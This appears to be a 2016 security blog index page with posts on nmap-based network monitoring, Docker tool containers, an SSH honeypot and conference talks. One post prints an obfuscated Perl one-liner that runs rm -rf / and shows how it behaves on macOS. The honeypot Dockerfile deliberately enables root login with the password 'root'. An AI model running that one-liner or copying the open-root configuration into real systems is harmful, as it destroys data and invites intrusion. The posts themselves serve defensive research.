Author: jgamblin

Continuous Network Monitoring With Slack Alerting

November 5, 20161609 Views

As I have talked about before “You can’t defend what you dont know exists” so today while sitting around and trying to recover from walking pneumonia I wrote slackmap to continually nmap a network and post the differences to slack:

Configuration is amazingly easy. I run a copy of this on a $5 a month Digitalocean Droplet for an external view and a Raspberry Pi for internal scanning.

Create a SlackBot and copy API Key.
Update and install needed software on server:
sudo apt-get update && sudo apt-get dist-upgrade
sudo apt-get install ssmtp nmap xsltproc
Create necessary folders:
sudo mkdir /nmap/
sudo mkdir /nmap/diffs
Copy this to /nmap/slackmap.sh and add SlackBot API key to Line 8:

https://gist.github.com/jgamblin/7d64a284e5291a444e12c16daebc81e0

Copy this line to your crontab to run this scan every 15 minutes (make longer for bigger networks):
*/15 * * * * /nmap/slackmap.sh
Enjoy a new level of network visibility. : )

Continuous Network Monitoring

November 4, 20161446 Views

I am often asked “What is the easiest thing companies can do to secure their networks?” and my answer is always always “Know what is on your network.” While that is simple advice it is a lot harder to implement. One company I was working with was looking at a system to do continuous network monitoring (read: scheduled nmap scans) for $40,000 a year.
After I cried for the state of my industry I told them I could do this for them with a small shell script, a $5 a month Digital Ocean Droplet and a free Sendgrid account.
Here is how I did it:

Created a free Sendgrid account.
Spun up $5 a Month Digitalocean Ubuntu Droplet.
Added a nmaper.company.com DNS record to be perfectly clear waht the box was doing.
Updated and installed needed software:
sudo apt-get update && sudo apt-get dist-upgrade
sudo apt-get install ssmtp nmap xsltproc
Created necessary folders:
mkdir /root/nmap/
mkdir /root/nmap/diffs
Edit /etc/ssmtp/ssmtp.conf with this:
[email protected]
mailhub=smtp.sendgrid.com
rewriteDomain=
[email protected]
UseSTARTTLS=YES
AuthUser=jgamblin
AuthPass=password
FromLineOverride=YES
Copy this to /root/namp/scan.sh:#!/bin/sh
TARGETS="54.226.178.109 scanme.nmap.org"
OPTIONS="-v -sV -T4 -F --open"
date=$(date +%F%T)
cd ~/nmap/diffs
nmap $OPTIONS $TARGETS -oA scan-$date > /dev/null
email()
{
/usr/sbin/ssmtp [email protected] <<EOF
From: [email protected]
Subject: nmap ndiff$(date +"%Y-%m-%d")*** NDIFF RESULTS ***
$(cat diff-$date)
EOF
}
if [ -e scan-prev.xml ]; then
ndiff scan-prev.xml scan-$date.xml > diff-$date
[ "$?" -eq "1" ] && email
fi
ln -sf scan-$date.xml scan-prev.xml
Test (add cat diff-$date to bottom of the script to see output.)
Add a cron job to crontab to run every 15 minutes (or hour for bigger networks)
Talk your boss into buying you something awesome with the $39,970 in savings.

It was as simple as that and I put this together in an afternoon. Up next is to build a Slackbot and an to deliver the differences to their slack channel.

Ubuntu Remote Desktop On Digital Ocean

October 19, 201621017 Views

I use DigitalOcean for a majority of my testing and from time to time I need a desktop environment to run some of my tools (like burp). After spending much more time than I want to admit I have it down to these 10 commands to bring a Ubuntu + Mate + XRDP desktop to a Ubuntu Droplet :
sudo apt-get update && sudo apt-get dist-upgrade -y
sudo apt-get install --no-install-recommends ubuntu-mate-core ubuntu-mate-desktop -y
sudo apt-get install mate-core mate-desktop-environment mate-notification-daemon xrdp -y
adduser burp
usermod -aG admin burp
usermod -aG sudo burp
su - burp
echo mate-session> ~/.xsession
sudo cp /home/burp/.xsession /etc/skel
sudo service xrdp restart
From there you can use any RDP viewer to connect to your droplet:

‘rm -rf /’ still works on OSX

October 16, 20161630 Views

Earlier this week someone sent me this one line perl script (that you shouldn’t run):
perl -e '$??s:;s:s;;$?::s;;=]=>%-{<-|}<&|`{;; y; -/:-@[-`{-};`-{/" -;;s;;$_;see'
Due to some really clever code obfuscation it runs rm -rf /.
You can deobfuscate (is that word?) with this:
perl -e 's;;=]=>%-{<-|}<&|`{;; y; -/:-@[-`{-};`-{/" -;;print "$_\n"'
While trying to figure out how this code code I stumbled upon the fact that OSX does not require --no-preserve-root which has been required since version 6.4 of GNU Core Utilities which was released in 2006.
Here is what happens if you run perl -e '$??s:;s:s;;$?::s;;=]=>%-{<-|}<&|`{;; y; -/:-@[-`{-};`-{/" -;;s;;$_;see' on Ubuntu 16:10:
Here is what happens if you run perl -e '$??s:;s:s;;$?::s;;=]=>%-{<-|}<&|`{;; y; -/:-@[-`{-};`-{/" -;;s;;$_;see' on MacOS 10.12:

This seems like a pretty big oversight by the Apple Team and I have filled a bug report but haven’t heard anything yet.

WAF Testing With Random User Agents.

October 5, 2016882 Views

Recently I have been working with some NGFW tools to automatically detect and block when someone is scraping, brute forcing or “load testing” your website. I quickly ran into a problem where none of the tools I use would allow me to quickly change user agents so I put together a couple of quick scripts that call one of 7500 valid user agents from this file.
First I went with the old standby of CURL which does the job but I was only able to do 10 requests in 4 seconds.
Here is what the output of curl.sh looks like:

That was not going to be fast enough for my testing needs so I switch to Apache Bench and am able to do 1,000 requests in 2 seconds. Which was what I need to do proper testing.
Here is what the output of ab.sh looks like:

All the scripts are in this GitHub Repo.
As always: Use these for good, not bad.

RaiNmap Container

August 30, 20162646 Views

I use nmap all the time at work and recently came across rainmap-lite which is an amazing web interface for nmap that allows you to easily schedule and email scan results. I wanted to be able to share it with a class I am teaching so I did what I have been doing lately and put it into a docker container:

Running it is as simple as:
docker run -ti -p 8080:8080 --name rainmap jgamblin/rainmapThen access:
http://yourip:8080/console
You can now run a ton of nmap scans and get the results emailed to you and your team:
Here is the DockerFile:
FROM ubuntu:latest RUN apt-get update && apt-get install sqlite3 git nmap python-pip -y RUN pip install --upgrade pip RUN pip install lxml RUN pip install Django RUN git clone https://github.com/cldrn/rainmap-lite WORKDIR /rainmap-lite/rainmap-lite/ ADD run.sh /rainmap-lite/rainmap-lite/run.sh RUN chmod 777 /rainmap-lite/rainmap-lite/run.sh CMD ./run.sh
Here is the run.sh:
#!/bin/bash sed -i "s/8000/8080/g" "nmaper-cronjob.py" echo What is your public IP address? read ip sed -i "s/127.0.0.1/$ip/g" "nmaper-cronjob.py" echo What is your SMTP user name? read user sed -i "s/[email protected]/$user/g" "nmaper-cronjob.py" echo What is your SMTP password? read pass sed -i "s/yourpassword/$pass/g" "nmaper-cronjob.py" echo What is your SMTP address? read smtp sed -i "s/smtp.gmail.com/$smtp/g" "nmaper-cronjob.py" python manage.py migrate python manage.py loaddata nmapprofiles python manage.py createsuperuser python manage.py runserver 0.0.0.0:8080 & while true do python nmaper-cronjob.py sleep 15 done
Protip: SendGrid offers a free SMTP server.

WebSnort Docker Container

August 25, 20162339 Views

One of the first things I like to do when I start looking at a PCAP during an investigation is run it through snort to see if it finds anything suspicious. You can easily do this at the command line with snort -dv -r test.pcap but the output is not great.
I have been using a tool called websnort for better output recently and decided it was time to put it into a docker container for easy portability.

To run it:
docker run -d -p 8080:8080 jgamblin/websnortIf you want to build your own the dockerfile is:
FROM ubuntu:latest
ENV DEBIAN_FRONTEND noninteractive
RUN apt-get update && apt-get install python-pip snort -y
RUN chmod a+r /etc/snort/snort.conf
RUN pip install websnort
CMD websnort
Protip:
malware-traffic-analysis.net has great PCAPs for testing your security tools.

Honeyfiles from my SSHoneypots

August 17, 2016743 Views

My friends at DigitalOcean were nice enough to give me a generous amount of credit on their cloud platform to do some security research with so I decided to do the most reckless thing I could think of and run a full ssh honeypot on the internet.
The build out is pretty simple, it is the SSHoneypot Docker Container I wrote on a debian droplet with all outbound traffic blocked so that in theory not much damage can be done.
Surprisingly, It has taken a few days for people to start exploiting the boxes but when I got up this morning 2 of the boxes had been “hacked”:
In order to share these findings with the community I will copy all files written to these honeypots to honeyfiles.jgamblin.com.

I have a long way to go with this project as way too much of it is manual now. I need to invest the time to automate notification, moving the files to the web server and starting a new container.
If you are interested in full pcaps or any of the actual exploited SSHoneypot containers reach out to me on twitter at @jgamblin I will be glad to share.

SSHoneypot*

August 1, 20161059 Views

I am at Security Summer Camp this week and you always hear about how how dangerous these networks are with no real proof so I decided to see how dangerous they are*. I built the most insecure docker container I can think of. It runs SSHD with the root password set to root* to see see what happens when I expose them to the blackhat and defcon networks.
I put the container here: jgamblin/sshoneypot
If you want to build and modify your own here is my base dockerfile:
FROM bashell/alpine-bash:latest
RUN apk update && apk upgrade
RUN apk add openssh openssh-sftp-server byobu tmux && \
/bin/sed -i -e 's/#PermitRootLogin prohibit-password/PermitRootLogin yes/' /etc/ssh/sshd_config && \
/usr/bin/ssh-keygen -A && \
echo "source /etc/profile.d/color_prompt" > /etc/skel/.bashrc && \
cp /etc/skel/.bashrc /root/.bashrc && \
echo "root:root" | chpasswd && \
su - root -c "byobu-launcher-install"
EXPOSE 22
CMD ["/usr/sbin/sshd", "-D", "-e"]
I have been running on a DigitalOcean droplet for a few hours and surprisingly, none of the bots have been successful yet.
I will have a blog post next week with full pcaps and copies of the containers for any that have successful logins.
*This is like a really bad idea.

The Security Summer Camp Talks I Want To See…

July 24, 2016391 Views

I took some time tonight and read through the Security Summer Camp (BSidesLV, Blackhat and Defcon) schedules and picked the talks from this year that I think will be the best and that I do not want to miss.
I ended up with these 16 talks I am going to make a special point to see next week:

BSidesLV

Managing Security with the OWASP Assimilation Project.
I want to see how Alan is using this OWASP project and how it compares to commercial CMDBs.
Automation of Penetration Testing and the future.
I am really interested in this subject as security is seriously lagging behind in the automation arms race and I think it will be the hottest trend in security over the next year.
How to Get and Maintain your Compliance without ticking everyone off.
The outline for this talk is a little sparse but I am interested in seeing what these guys come up with since I know them and am interested in this subject.
How to travel to high-risk destinations as safely as possible.
Ryan will do an amazing job on this talk but I am going to go to this talk to see how many of these things I can steal for my own OpSec.
A Peek Behind Vegas Surveillance.
Um… because why not? I love Oceans 11.
Automation Plumbing.
Another automation talk…. I sense a trend.

BlackHat

An insider’s guide to cyber-insurance and security guarantees.
I am interested in this subject in general and how it will shape security in the next few years.
Cyber war in perspective: analysis from the crisis in ukraine
I have a read a couple of books and watched winter on fire about this conflict so it will be interesting to hear about it from cyber-war perspective.

Defcon

Universal Serial aBUSe: Remote physical access attacks.
This is going to be the best and most talked about talk at Defcon. If Dominic brings the tool outlined in the talk (and he will) you will be reading about this for the next month.
Realtime bluetooth device detection with Blue Hydra
I love hacking bluetooth devices and Blue Hydra is an amazing new tool.
BSODomizer HD: A mischievous FPGA and HDMI platform for the (m)asses
These guys know so much about hacking hardware and this talk and tool is going to be amazing. I hope Joe has a kit together by Defcon so I can buy it.
101 Ways to Brick your Hardware
Joe FitzPatrick is one of the smartest guys I know and watching this talk on how his failures will be entertaining, educational and inspiring. Amazing and truly talented people can always laugh at themselves.
Picking Bluetooth Low Energy Locks from a Quarter Mile Away
um…. are you telling me you wouldn’t want to see this?
Hacking Hotel Keys and Point of Sale systems
I am glad I will be checked out of my room by the time this talk is given.

Other

Sun, Sin, Security: IOActive
IOActive does an amazing job with their event every year and they will have some amazing talks.
Securing the Internet of Things (SIOT)
I love IOT security and I will be speaking at this event.
I will just leave this here for discussion at another time but I am probably skipping the Blackhat badge next year:

Conference	Badge Cost	Talks	Cost Per Talk
BSidesLV	$0.00	6	$0.00
BlackHat	$2,295.00	2	$1,147.50
Defcon	$240.00	6	$40.00

Older Posts

Newer Posts